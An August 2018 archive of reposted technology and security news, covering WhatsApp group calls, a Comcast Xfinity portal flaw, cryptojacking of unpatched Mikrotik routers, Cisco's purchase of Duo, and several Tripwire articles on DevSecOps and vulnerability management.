Monthly Archives: August 2018

WhatsApp now allows group voice and video calls between up to 4 people

WhatsApp has added a much-requested new feature after it began to allow users to make group voice and video calls.

It’s been just over three years since the company, which is owned by Facebook, introduced voice calls and later a video option one year later. Today, WhatsApp counts over 1.5 billion monthly users and it says they make over two billion minutes of calls via its service each day.

Starting this week, callers can now add friends by hitting the “add participant” button which appears in the top right corner of their screen. The maximum number of participants is four and, impressively, WhatsApp said the calls are end-to-end encrypted.

That’s not an easy thing to do. Telegram, a self-professed secure messaging app, hasn’t even gotten around to encrypting its group messaging chats, let alone group calls.

On the encryption side, WhatsApp has long worked with WhisperSystems to cover all messages and calls on its platform from prying eyes and ears. That said, the relationship between the two become a little more complicated this year when WhatsApp co-founder Brian Acton donated $50 million of his wealth — accumulated from Facebook’s acquisition of his company in 2014 — to the Signal Foundation, which is associated with WhisperSystems.

Acton quit Facebook last year — this year he encouraged people to delete the social network for its data and privacy screw-ups — while his fellow WhatsApp co-founder Jan Koum joined him in departing in May of this year.

Like Acton, Koum was apparently irked by scandals such as Cambridge Analytica, although his on record explanation for quitting was to “do things I enjoy outside of technology, such as collecting rare air-cooled Porsches, working on my cars and playing ultimate frisbee.” Each to their own.

 

via:  techcrunch

Flaw exposed Comcast Xfinity customers’ partial home addresses and SSNs

Poor security measures have reportedly put the personal details of Comcast Xfinity customers at risk, a researcher has revealed.

According to a BuzzFeed News report, security researcher Ryan Stevenson found a vulnerability in the high-speed ISP’s online customer portal that could allow unauthorised parties to determine the partial home address of customers.

The flaw was found in the “in-home authentication” webpage that customers could use to access their Comcast Xfinity bills without the hassle of logging in.

In-home authentication (also known as Home-Based Authentication, HBA, or IP authentication) is supposed to reduce the friction for customer attempting to access their accounts and reduce the number of password resets requested.

The webpage requested that users verified their accounts by choosing their correct home address from a displayed list of four partial home addresses.

Choose the correct address, and you gain access to the billing account.

How does Comcast Xfinity know which is your correct home address? By looking at the webpage visitor’s IP address.

But there lies the problem. Security researcher Ryan Stevenson was able to spoof a customer’s IP address and trick Comcast by changing the X-Forwarded-For header in their request.

Then, by repeatedly refreshing the login page, three of the suggested partial home addresses would change – and only one would stay the same, the correct one belonging to the targeted customer.

An attacker would now know the first digit of the customer’s street number and the first three letters of the street where they lived with asterisks hiding all other characters.

As BuzzFeed News explains, it would then be possible for a malicious hacker to determine the customer’s city, state, and postal code for the partial address by using an IP lookup website.

It’s easy to imagine how an individual might be targeted using the technique, as an IP address is shared with any website internet users access. If a malicious actor wanted to determine a particular XFinity customer’s home address, they might even simply send their target a link to a webpage under their control or embed a tracking pixel inside an HTML message with the specific intention of capturing an IP address.

But the story doesn’t end there, as Stevenson also found another security hole in Comcast Xfinity’s systems – specifically a sign-up for page for authorized dealers. The webpage was vulnerable to hackers attempting to brute force a customer’s Social Security Number.

A form on the page requested the customer’s home address to be entered (perhaps determined using the technique described above) along with the last four digits of the customer’s Social Security Number.

In a huge blunder, the webpage allowed an unlimited number of attempts to get the last four digits of the social security number correct – meaning an attacker could simply write some code to automatically cycle through all the possibilities from 0000 to 9999 until hitting gold.

Comcast responded to the report of the vulnerabilities from BuzzFeed News, patching quickly to avoid the security holes being exploited by others in the future:

“We quickly investigated these issues and within hours we blocked both vulnerabilities, eliminating the ability to conduct the actions described by these researchers. We take our customers’ security very seriously, and we have no reason to believe these vulnerabilities were ever used against Comcast customers outside of the research described in this report.”

 

 

via:  tripwire

Many Developers Have Yet to Take Responsibility for Code Security, Reveals DevOps Study

A DevOps survey revealed that many developers have yet to take responsibility for the security of the code they produce.

According to Checkmarx’s report, “Managing Software Exposure: Time to Fully Embed Security into Your Application Lifecycle,” 93 percent of respondents said it’s either highly desirable or desirable that developers take responsibility for the security of the code they produce. But many developers aren’t living up to this ownership. Just 51 percent of respondents reported that their developers shoulder this duty. Forty-one percent of participants revealed this issue is addressed quite poorly or not at all at their organization.

Feeding this challenge could be a lack of training among developers on how to produce secure code. Nearly all (96 percent) respondents emphasized the importance of this training. But less than half said it’s being appropriately addressed at their workplace. Meanwhile, 49 percent of participants asserted that this training is not receiving the focus it deserves.

For its report, Checkmarx surveyed 183 individuals who hold IT, security and software development titles at organizations worldwide. Their responses help illustrate some of the challenges involved with injecting security into the DevOps cycle.

One of the obstacles uncovered in the study is the fact that software security is still overlooked by many boards. More than half (57 percent) of respondents said that software security now warrants a boardroom-level discussion. But 45 percent said it’s hard to get executives’ buy-in for this issue.

Another challenge revealed in the report is that developers and operations personnel are still struggling to make a cohesive DevOps culture. Seventy-two percent of survey participants said as much when they admitted that different teams within IT are still reluctant to trust one another.

It’s important that organizations consider all these issues of merging DevOps with security going forward. But Checkmarx has a recommendation for what should be a priority:

The reality is that in order to prevent potential software exposure throughout the software development lifecycle, we must first tackle the issue of ownership and responsibility, bringing together employees of diverse skill levels and backgrounds to help inspire more mutual trust and respect.

 

 

Via:   tripwire

Microsoft launches undersea, free-cooling data center

Underwater data centers offer the benefit of free water cooling, plus they bring the ultimate in edge computing — placed in open water, close to the population, and rent free.

Microsoft launches undersea, free-cooling data center

A free supply of already-cooled deep-sea water is among the benefits to locating pre-packaged data centers underwater, believes Microsoft, which recently announced the successful launch of a submarine-like data center off the coast of the Orkney Islands in Scotland.

The shipping-container-sized, self-contained server room, called Project Natick, submerged earlier this month on a rock shelf 117 feet below the water’s surface also has the benefit of potentially taking advantage of bargain-basement real estate near population centers — there’s no rent in open sea.

“Project Natick is an out-of-the-box idea to accommodate exponential growth in demand for cloud computing infrastructure near population centers,” John Roach writes on Microsoft’s website.

Microsoft is implementing its sunken project in cold North Sea water off Scotland, which isn’t a population-dense area. If the concept proves successful, there’s no reason similar tube-like structures couldn’t be slid, rent-free, into water anywhere land values are high, and where end-user edge-computing is required.

Seawater for cooling is on-trend. It’s been used for years in power generation, but it is being used increasingly in data centers. The on-land 75-hall Lefdal Mine Datacenter, located underground, below a mountain in Norway, is located next to a “deep, cold fjord,” the former-mine’s website explains. That’s good not only for carbon-neutral hydroelectric power, but also for cooling, it reckons.

 

 

Cold seawater is the cooling source for the highly secure location, Lefdal says. Forty-six degree Fahrenheit water is fed into the fjord by four glaciers. And with the data center built below sea level, no energy is used to raise the already-chilled water. Seawater cools the halls’ water circuit from 86 degrees to 64 degrees Fahrenheit.

“The most joyful moment of the day was when the data center finally slipped beneath the surface on its slow, carefully scripted journey,” Ben Cutler, a manager on Microsoft’s undersea project, is quoted as saying of the Natick launch, by Roach. It wasn’t easy, in other words: An Internet-carrying cable, along with power that was laid earlier, had to be recovered from the sea floor using a remote device. Ten winches were then used along with a barge and a crane to perform the off-shore dive.

Help from the European Marine Energy Centre

It’s not a coincidence that Natick, off Orkney, is also the site of the European Marine Energy Centre (EMEC). The wave energy supplying test center wasn’t conceived as a data center solution provider, but it has become a resource provider for Microsoft. It hauled Natick around and has provided connections. The group believes their wave-energy resources are just as suitable for data centers.

“We have cables in the sea [there] just waiting for people to be ready to connect their devices that can transmit the necessary power and data to and from the shore,” says Neil Kermode, the group’s managing director, in a blog post.

“More than half of the world’s population lives within about 120 miles of the coast,” Roach says in the Microsoft article. “By putting data centers in bodies of water near coastal cities, data would have a short distance to travel to reach coastal communities, leading to fast and smooth web surfing, video streaming and game playing, as well as authentic experiences for AI-driven technologies.”

 

via:  networkworld

Routers turned into zombie cryptojackers – is yours one of them?

We’ll start this story right at the end:

  • Users and sysadmins. Patch early, patch often.
  • Vendors and programmers. Don’t store plaintext passwords.

In this particular case, the vulnerable devices under attack are Mikrotik routers that haven’t been patched since April 2018.

Security researcher Simon Kenin at Trustwave pieced the story together, following reports that there seemed to be a surge of web-based cryptojacking in Brazil.

Kenin quickly realised that Brazil was something of a red herring in the story, because the attack was happening wherever the crooks could find unpatched Mikrotik routers.

Brazil just happened to be where the story broke – it is, after all, the fifth most populous country in the world, so there are a lot of Brazilian home and small business networks for crooks to find and attack.

Here’s how this cryptojacking attack seems to have gone down.

Back in April 2018, Mikrotik patched a remote access vulnerability in its products.

As far as we can tell, Mikrotik discovered the security flaw itself, describing it in basic terms as a vulnerability that “allowed a special tool to connect to the [administration] port, and request the system user database file.”

As it turned out, there was a bit more to it than that – the bug allowed any file to be read off the router, effectively giving crooks who knew the trick the opportunity to leech any data they wanted.

The user database file just happened to be the crown jewels, because Mikrotik had stored both usernames and passwords in plaintext.

As any regular Naked Security reader will know, you almost never [*] need to store passwords in a way that they can be recovered.

You can verify that a supplied password is correct by matching it against a database entry computed from the password using a cryptographic technique known colloquially as salt-hash-stretch.

You calculate forwards from the supplied password to get a unique “match string” to confirm the password, but because of how the salt-hash-stretch algorithm works, you can’t go backwards from the match string to work out anything about the password from which it was computed.

Simply put, you hardly ever [*] need to store actual passwords in files on on disk, or even to store encrypted versions of passwords that can be unscrambled on demand.

That’s because you typically only need to check that a password was correct, not to record permanently what it was.

Sure, the crooks aren’t supposed to be able to steal your user database file in the first place, but there’s no point in making your username file into an instant password giveaway if it does get stolen.

How the bug was weaponised

Unfortunately, perhaps, a pair of security researchers going by @n0p and @yalpanian took Mikrotik’s patch and reverse-engineered it to recover the bug it was supposed to fix.

They subsequently published a proof-of-concept exploit, written in Python, that showed how to use the recovered flaw to extract the admin password from an unpatched Mikrotik router.

Exploits of this sort are sometimes considered to be “mostly harmless”, assuming that the exploit comes out after there’s been time to apply the patch.

In practice, of course, patches are often ignored for weeks or months, so that proof-of-concept exploits are also warmly welcomed by cybercrooks.

Anyway, the crooks in this cryptojacking saga seem to be using the Mikrotik admin-port attack vector (we have no idea if they actually started with n0p’s proof-of-concept or figured it out for themselves) to do their dirty work.

Sneakily, this particular router takeover didn’t require any code hacking or low-level network trickery.

According to Kenin, the crooks simply replaced a file called error.html, transmitted by Mikrotik’s built-in web proxy whenever there’s an HTTP error, with a web page that loads the CoinHive browser-based cryptomining software.

In other words, if you’re at a coffee shop where the owner has an unpatched Mikrotik router and has configured it to push all HTTP traffic through the web proxy, you’ll end up cryptomining on behalf of the crooks every time there’s a browsing problem.

Silently redirecting all web traffic in this way is known as transparent proxying. It’s not unusual on free shared networks such as coffee shops, trains, airports and so on. Often, the network operator isn’t trying to spy on you, or to censor your browsing. The goal is simply to block access to sites that eat a lot of bandwidth a lot of the time, such as video streaming or gaming servers. This helps to spread the available bandwidth a bit more fairly amongst all users.

Will the crooks get rich?

We doubt that the crooks will make much money here, so we’re hoping that their enthusiasm for the this sort of attack will wane pretty quickly.

You’ll only get cryptojacked if you are browsing via the Mikrotik proxy; the cryptojacking will only kick off when there’s an error to report; and the cryptomining will only last until you exit from the browser tab with the cryptomining code in it.

You’re very likely to notice the cryptojacking, not least because your computer will slow down as its processors dedicate themselves to cryptomining.

If you have a laptop with cooling fans, you’ll probably them kick in at full throttle to deal with the heat generated by the cryptojacking.

Also, Mikrotik’s proxy only supports HTTP, not HTTPS.

Transparent proxies can’t peek inside HTTPS traffic without your explicit agreement, because the data in an HTTPS session is encrypted by your browser and, by default, can only be decrypted when it reaches the web server at the other end of the link.

So if you stick to HTTPS you won’t be sending traffic through the router’s proxy anyway.

What to do?

If you have a Mikrotik router, you really do want to patch this hole.

Firstly, cryptojacking is bad in absolute terms, even if the crooks only do a tiny bit of it very occasionally.

Secondly, if cryptojackers can reconfigure your router this easily, other crooks could hack you, too, perhaps with more serious side-effects.

So, here are our two initial points again, with a bonus piece of advice for good measure:

  • Users and sysadmins: patch early, patch often. For better or for worse, patches may end up being the public documentation of how a security hole works – it’s usually much easier to go backwards from a patch to an exploit than to figure out the exploit from first principles. In other words, the longer you leave it before patching, the longer you give the crooks to work back from the fix to a viable attack.
  • Vendors and programmers: don’t store plaintext passwords. You almost never need to – you can store salted-hashed-and-stretched passwords instead so that a breach of your password database means the crooks still have plenty of work to do to figure out what passwords match which hashes. Users who change their passwords quickly will beat the crooks to it, and the old hashes will be useless.
  • Everyone on the internet: stick to HTTPS as much as you can. Why use HTTP, which makes it really easy for crooks to intercept, spy on and tamper with your browsing, when you can use HTTPS, which makes all of those things very much harder?

By the way, even if you don’t have any Mikrotik hardware, why not check your own router for an update – and why not do it today?

 

via:  nakedsecurity

Security as a Quality Gate for DevOps

It’s hardly a controversial statement to say that DevOps is changing the way that organizations build and deploy applications. There’s plenty of material, stories, whitepapers and whole companies that demonstrate this trend. There are, however, a couple of things that make a discussion about security and DevOps important.

First, while there are a lot of organizations that have adopted DevOps tools and processes, there are many, many more that haven’t. That means that there are a lot of organizations that will do so in the future. And where there is adoption, it’s not necessarily comprehensive. It may be that one group has done so, or that teams are using some tools, but not others. In other words, DevOps is still fundamentally an early-stage technological movement.

The second reason is that DevOps is set to transform security, and no one is quite sure what that means, though there are a lot of opinions on the topic. Given that context, what should we be doing to secure this brave new world? We should start by looking at the pervasive industry problems. It’s tempting to start any DevSecOps discussion with technology. There’s a lot of it, and there’s always something new. But DevOps is really about solving a business problem, and so we should stay a level above the technology, at least for a bit.

Problem 1: Unacceptable Risk

A typical DevOps lifecycle involves pre-deployment testing, but rarely scanning for risks such as vulnerabilities, misconfigurations and compliance. It’s important to talk about risk broadly because all of these elements are real and can have a real impact on an organization. It’s tempting to focus on vulnerabilities, and it’s tempting to state that they all need to be fixed, but the reality is that ‘risk’ is broad and acceptance is organizationally specific. If risks aren’t caught prior to deployment of images to production, then unacceptable risks are also deployed.

Problem 2: Vulnerable Repositories

If you really think about it, every incident starts with some change. That change may, however, occur outside of your organization. Vulnerabilities are discovered all the time, and when a new vulnerability is published, an asset that you previously counted as acceptably secure might suddenly change state (though nothing on the asset itself has changed). Container repositories suffer from the same issue. If you’ve got a collection of images stored for use, even if you assessed them when they were added to that repository, they might become vulnerable over time.

Problem 3: Production Assessment is Too Late

A totally valid response to the first problem might be to apply the information security tools you have today to DevOps. These are tools that were largely developed to secure servers, workstations, laptops and network devices. Repurposing them for DevOps often results in questions like “can we put <security agent> in the running containers” and “can I scan the running containers for vulnerabilities.” These are patently bad ideas, but they are not sufficient, and perhaps more importantly, inefficient. Introducing security controls at the production end of the process, and then trying to address findings, is one way to create friction between DevOps and Security.

Driving Towards Solutions

It does no good to talk about problems without a discussion of the solutions. There are a number of requirements that apply here and it’s worthwhile to enumerate them.

PRE-DEPLOYMENT ASSESSMENTS

This is clearly a core requirement for any solution to the problems discussed above. Assessment must be done prior to pushing containers to production in order to catch risk before it’s exploitable.

INTEGRATION WITH DEVOPS TOOLS

In order to be effective in a DevOps environment, the solution must integrate with the tools that developers are already using. That means that it can’t require additional manual steps on a build-by-build basis, or that the developer go to a different tool to get results. DevOps is about velocity, so creating friction needs to be avoided.

ASSESSMENT SCOPE

Recall the difference between ‘vulnerabilities’ and ‘risk’ that was discussed above? It’s vital that the assessment provided actually identifies the risks that matter to your organization. There’s not such thing as a ‘security scan.’ There are scans for more specific risks, like vulnerabilities, misconfigurations, compliance. Leaving risk out of the process means letting it into production.

ACCESSIBILITY

DevOps doesn’t usually happen in one team or one place (logical or geographical). When I say ‘accessibility,’ I’m intending to describe the requirement that the technology and people who need access to the solution can do so without substantially changing how they do their job. Part of the answer here is likely SaaS, but also elasticity to deal with the requirements of your business.

POLICY DRIVEN

Finally, risk is personal. A solution that finds all the bad things and then requires that you fix them in simply insufficient. As a team or organization, you need to define what level of risk you’re willing to tolerate, and then you need to be able to instantiate that as the quality gate in the solution.

DevOps really is poised to change the security landscape. While there are bound to be more problems to solve that we haven’t discovered yet, there’s real work to be done here today. It’s not an impossible task, but it does take awareness and effort.

To learn more, Tripwire is hosting a special webcast on August 21 titled “Leading a DevOps Transformation.

Join us and guest presenters to learn how to help your organization achieve higher levels of performance whilst ensuring security is a continuous aspect of the process.

You can register here or click on the image below!

 

via: tripwire

DevOps and Cloud – The Match that Drives Today’s Businesses

When concepts like DevOps and Cloud computing come together, this powerful combination propels organizational growth at a rapid speed.

Some trends in today’s industry have helped bring about the collaboration of these two most important change agents. Let’s take a look at them here:

  1. The world is witnessing an industry-wide shift wherein we are transitioning from a product-based economy to a service-based economy.
  2. The 21st century business environment demands that companies focus on agility & innovation rather than stability and efficiency.
  3. The digital dimension has drastically begun to influence the physical dimension.

Most organizations today are beginning to realize the potential of these business transformation agents. While DevOps is a more process-oriented concept, the cloud acts as a catalyst to pace up this process.

DevOps-and-Cloud-The-Match-that-Drives-Todays-Businesses

DEVOPS CLOUD BENEFITS

Cloud computing complements DevOps in a way that its flexibility provisions experimentation in the DevOps process. The agility of cloud computing makes it an ideal partner to work with.

Operations-oriented companies use cloud-computing to pace up the development process and a developer’s productivity and efficiency at an individual level with cloud tools, application-specific infrastructure, and self-service catalogs.

With DevOps in the cloud, the two teams work together ,understanding each other’s language, with developers teaching operations about code, operations teaching developers about infrastructure, and security leading to a close-knitted circuit of similar thinking professionals.

The transformation from the product to service economy alongside data infusion has transformed software providers into customers who also use the services of the cloud to provision software-as-a-service (SAAS).

New-generation apps need complex technology stacks that require great effort for creation and configuration. And thanks to the cloud, these development functions are performed in a matter of minutes or hours unlike earlier times when development activity took weeks or months.

SECURITY IN DEVOPS AND CLOUD

with many companies are falling prey to hacking, it is always crucial to implement security in the framework of your infrastructure.

And since DevOps and the cloud are the most utilized and most crucial platforms that drive business development, most IT professionals are incorporating security in these platforms.

DevOps professionals are embedding security as code (coming to be recognized as DevSecOps) into the DevOps framework so that future instances of security breaches are avoided, whereas in the cloud, most cloud providers equip their applications, tools, and mainly infrastructure with security measures giving customers the assurance of safe business operations. Even in the event of a security breach, options like business continuity and disaster recovery help you recover what matters the most.

HERE ARE SOME BEST PRACTICES OF DEVOPS IN THE CLOUD:
  • The DevOps team should develop a self-service approach wherein professionals ensure that the speed with which the cloud delivers should not be affected by the continuation of traditional practices.
  • DevOps automation should not just be a workflow element but rather become a culture that encourages everyone to identify roadblocks and look to eliminate them.
  • And lastly, measure every process to ensure its desired outcome
WHAT ORGANIZATIONS NEED TO CONSIDER WHEN WORKING WITH DEVOPS IN THE CLOUD

DevOps is definitely a cultural transformation that is made better and achieved faster with assistance from the cloud but not without organizational support. Secondly, while It is always attractive for DevOps teams to work with the latest technology or opt for a cloud provider who offers the best price, organizations need to consider several factors within the organization to go ahead with its need for cloud adoption.

Lastly, it is not DevOps vs cloud but rather a DevOps-Cloud collaboration that drives the success of most 21st century business. DevOps tools may not be enough to meet the growing demands of a constantly changing market, but the cloud can be a wise solution for faster deployment of code and software development.

Also, Tripwire is hosting a special webcast on August 21 titled “Leading a DevOps Transformation“.

Join us and guest presenters to learn how to help your organization achieve higher levels of performance whilst ensuring security is a continuous aspect of the process.

You can register here or click on the image below!

 

via:   tripwire

Determining Importance with Objective Vulnerability Scoring

The holiday season is upon us, and nearly every day, my wife asks me what I want for Christmas. As a pop culture geek with interests in most fandoms, I have dozens of items that I could ask for, but the ultimate question is what do I really want to ask her to spend money on.

In a perfect and very geeky world, I would likely come up with a method of measuring my interests, but in reality, I’m ultimately going to just pick an item near and dear to my heart. That’s because our choices in situations like this tend to be subjective.

While these types of determinations of importance should be subjective, we often see subjective vulnerability scoring that should be objective. Systems like High, Medium, Low, and 1-5 are not objective and provide minimal value when prioritizing risk in your environment.

There are better ways to prioritize risk.

The most famous example would be CVSS, a system which is available in every vulnerability management solution. With CVSSv2, we saw vendors take their own twists on the calculation, sometimes adding their own scoring levels. We also saw instances where scores were calculated differently based on personal opinion. CVSSv3 has improved upon this with stricter definitions, but score generation still manages to be subjective as some definitions are ignored and redefined. At this time, however, it is the most accurate and valuable publicly available scoring system.

The Tripwire IP360 Scoring System is as objective as they come and factors in all the criteria critical to your environment including vulnerability age, level of access, and ease of attack. It provides Tripwire IP360 users with a clearly defined prioritization that makes resolving vulnerabilities an objective process.

Should you require more for your environment, ASPL-Based Scoring allows customers to tweak the Tripwire IP360 scoring system while knowing that the foundation is still completely objective.

There are times when you need customization in your environment, but you should be allowed to determine where that customization occurs. If everyone else applies their own customizations (as seems to sometimes be the case with other popular scoring systems), it’s impossible to know if they make sense in your environment.

With ASPL-Based Scoring, Tripwire’s ASPL (content) packages contain our trusted, objective scoring while still allowing you the flexibility to know that critical issues in your environment are elevated with subtle tweaks to the Tripwire IP360 score of a specific vulnerability.

Don’t let your vulnerability management system provide you with a vulnerability prioritization similar to how you select a gift. Instead, rely on a scientific approach that gives clear, concise results every time.

Either way, use the vulnerability prioritization as a good way to prioritize your issues.

 

via:  tripwire

Cisco is buying Duo Security for $2.35B in cash

Cisco announced its intention to buy Ann Arbor, MI-based security firm, Duo Security. Under the terms of the agreement, Cisco is paying $2.35 billion in cash and assumed equity awards for Duo.

Duo Security was founded in 2010 by Dug Song and Jonathan Oberheide and went on to raise $121.M through several rounds of funding. The company has 700 employees with offices throughout the United States and in London, though the company has remained headquartered in Ann Arbor.

Co-founder and CEO Dug Song will continue leading Duo as its General Manager and will join Cisco’s Networking and Security business led by EVP and GM David Goeckeler. Cisco in a statement said they value Michigan’s “resources, rich talent pool, and infrastructure,” and remain committed to Duo’s investment and presence in the Great Lakes State.

The acquisition feels like a good fit for Cisco. Duo’s security apparatus lets employees use their own device for adaptive authentication. Instead of issuing key fobs with security codes, Duo’s solution works securely with any device. And within Cisco’s environment, the technology should feel like a natural fit for CTOs looking for secure two-factor authentication.

“Our partnership is the product of the rapid evolution of the IT landscape alongside a modernizing workforce, which has completely changed how organizations must think about security,” said Dug Song, Duo Security’s co-founder and chief executive officer. “Cisco created the modern IT infrastructure, and together we will rapidly accelerate our mission of securing access for all users, with any device, connecting to any application, on any network. By joining forces with the world’s largest networking and enterprise security company, we have a unique opportunity to drive change at a massive scale, and reshape the industry.”

Over the last few years, Cisco has made several key acquisitions: OpenDNS, Sourcefire, Cloudlock, and now Duo. This latest deal is expected to close in the first quarter of Cisco’s fiscal year 2019.

 

via:  techcrunch

The Five Stages of Vulnerability Management

A key to having a good information security program within your organization is having a good vulnerability management program. Most, if not all, regulatory policies and information security frameworks advise having a strong vulnerability management program as one of the first things an organization should do when building their information security program.

The Center for Internet Security specifically lists it as number three in the Top 20 CIS Controls.

Over the years, I’ve seen a variety of different vulnerability management programs and worked with many companies with various levels of maturation in their VM programs. This post will outline the five stages of maturity based on the Capability Maturity Model (CMM) and give you an idea as to how to take your organization the next level of maturity. To read the full whitepaper, check out this link.

What is the Capability Maturity Model?

The CMM is a model that helps develop and refine a process in an incremental and definable method.  More information on the model can be found here. The five stages of the CMM are:

Source: http://www.tutorialspoint.com/cmmi/cmmi-maturity-levels.htm

Stage 1: Initial

In the Initial stage of a vulnerability management program, there are generally no or minimal processes and procedures. The vulnerability scans are done by a third-party vendor as part of a penetration test or part of an external scan. These scans are typically done from one to four times per year at the request of an auditor or a regulatory requirement.

The vendor who does the audit will provide a report of the vulnerabilities within the organization. The organization will then typically remediate any Critical or High risks to ensure that they remain compliant. The remaining information gets filed away once a passing grade has been given.

As we’ve seen over the course of the last couple of years, security cannot just be treated as a compliance checkbox. If you are still in this stage, you are a prime target for an attacker. It would be wise to begin maturing a program if you haven’t started already.

Stage 2: Managed

In the Managed stage of a vulnerability management program, the vulnerability scanning is brought in-house. The organization defines a set of procedures for vulnerability scanning. They would purchase a vulnerability management solution and begin to scan on a weekly or monthly basis. Unauthenticated vulnerability scans are run, and the security administrators begin to see vulnerabilities from an exterior perspective.

Most organizations I see in this stage do not have support from their upper management, leaving them with a limited budget. This results in purchasing a relatively cheap solution or using a free open-source vulnerability scanner. While the lower-end solutions do provide a basic scan, they are limited in the reliability of their data collection, business context and automation.

Using a lower-end solution could prove to be problematic in a couple of different ways. The first is in the accuracy and prioritization of your vulnerability reporting. If you begin to send reports to your system administrators with a bunch of false positives, you will immediately lose their trust. They, like everyone else these days, are very busy and want to make sure they are maximizing their time effectively. A reliable and accurate report is critical to ensuring that remediation can occur in a timely manner.

The second problem is that even if you verify that the vulnerabilities are in fact vulnerable, how do you prioritize which ones they should fix first? Most solutions offer a High, Medium, Low or a 1-10 score. With the limited resources system administrators have, they realistically can only fix a few vulnerabilities at a time. How do they know which 10 is their most 10 or which High is the most High? Without appropriate prioritization, this can be a daunting task. Granted, an industry standard such as CVSS is warranted for a common communication mechanism. Being able to prioritize in addition to this provides tremendous value.

Stage 3: Defined

In the Defined stage of a vulnerability management program, the processes and procedures are well-characterized and are understood throughout the organization. The information security team has support from their executive management as well as trust from the system administrators.

At this point, the information security team has proven that the vulnerability management solution they chose is reliable and safe for scanning on the organization’s network. As recommended by the Center for Internet Security, authenticated vulnerability scans are run on a, at minimum, weekly basis with audience-specific reports being delivered to various levels in the organization. The system administrators receive specific vulnerability reports, while management receives vulnerability risk trending reports.

Vulnerability management state data is shared with the rest of the information security ecosystem to provide actionable intelligence for the information security team.  For example, if an exploit is detected on the external firewall, a quick correlation can be run in the Security Incident and Event Management (SIEM) tool to identify which systems are vulnerable to that exploit.

The majority of organizations I’ve seen are somewhere between the Managed and the Defined stage. As I noted above, a very common problem is gaining the trust of the system administrators. If the solution that was initially chosen did not meet the requirements of the organization, it can be very difficult to regain their trust.

Stage 4: Quantitatively Managed

In the Quantitatively Managed stage of a vulnerability management program, the specific attributes of the program are quantifiable, and metrics are provided to the management team. The following are some vulnerability metrics that every organization should be tracking:

  • What is the percentage of the organization’s business systems that have not recently been scanned by the organization’s vulnerability management system?
  • What is the average vulnerability score of each of the organization’s business systems?
  • What is the total vulnerability score of each of the organization’s business systems?
  • How long does it take, on average, to completely deploy operating system software updates to a business system?
  • How long does it take, on average, to completely deploy application software updates to a business system?

These metrics can be viewed holistically as an organization or broken down by the various business units to see which business units are reducing their risk and which are lagging behind.

Stage 5: Optimizing

In the Optimizing stage of a vulnerability management program, the metrics defined in the previous stage are targeted for improvement. Optimizing each of the metrics will ensure that the vulnerability management program continuously reduces the attack surface of the organization. The Information Security team should work with the management team to set attainable targets for the vulnerability management program. Once those targets are met consistently, new and more aggressive targets can be set with the goal of continuous process improvement.

Vulnerability management, combined with asset discovery, cover the top three of the Top 20 of the CIS Controls. Ensuring the ongoing maturation of your vulnerability management program is a key to reducing the attack surface of your organization. If we can each reduce the surface the attackers have to work with, we can make this world more secure, one network at a time!

 

via:  tripwire